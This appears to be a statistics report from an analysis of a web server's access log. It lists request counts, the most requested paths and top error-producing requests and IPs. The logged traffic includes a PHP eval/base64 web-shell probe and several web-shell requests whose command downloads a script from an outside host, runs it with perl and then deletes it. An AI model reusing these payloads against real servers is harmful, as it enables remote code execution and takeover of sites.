UNIQUE REQUESTS
4780

REQUESTS STATS
      1 g369g=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOztlY2hvKCJlNTBiNWYyYjRmNjc1NGFmMDljYzg0NWI4YjU4ZTA3NiIpOztlY2hvKCJ8PC0iKTs7ZGllKCk7GET
   3730 GET
    128 HEAD
    918 POST
      3 PUT

TOP 10 MOST FREQUENT
99125 /administrator/index.php
22043 /apache-log/access.log
6626 /
4971 /templates/_system/css/general.css
4724 /administrator/index.php
3965 /apache-log/access.log
2968 /robots.txt
2190 /favicon.ico
1556 http://almhuette-raith.at/administrator/index.php
1546 /wp-login.php

TOP 5 REQUEST BY BODY BYTES SENT WITH 4XX STATUS CODE
164.132.159.94 404 442 /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwjLqNrK_8TNAhWTSxoKHYuUCm84rAIQFgi9AzBP&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.*
164.132.159.94 404 442 /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwjLqNrK_8TNAhWTSxoKHYuUCm84rAIQFgi9AzBP&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php
164.132.159.94 404 442 /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwi42O_M_8TNAhWFXhoKHYc8DE043gIQFgi1ATAd&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.*
164.132.159.94 404 442 /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwi42O_M_8TNAhWFXhoKHYc8DE043gIQFgi1ATAd&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/index.inc.php
164.132.159.94 404 437 /index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D50%26Itemid%3D56&amp;sa=U&amp;ved=0ahUKEwjLqNrK_8TNAhWTSxoKHYuUCm84rAIQFgi9AzBP&amp;usg=AFQjCNESXAyEBT2Tm9HSkP0-zDYPtMGW1Q/images/com_adsmanager/ads/uploaded/petx.php?shxxx=wget%20http://www.fia.com.gr/wp-content/uploads/2010/doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc.*

TOP 5 USERS BY REQUESTS COUNT WITH 5XX STATUS CODE
225 189.217.45.73
4 82.193.127.15
3 91.210.145.36
2 198.38.94.207
2 195.133.48.198
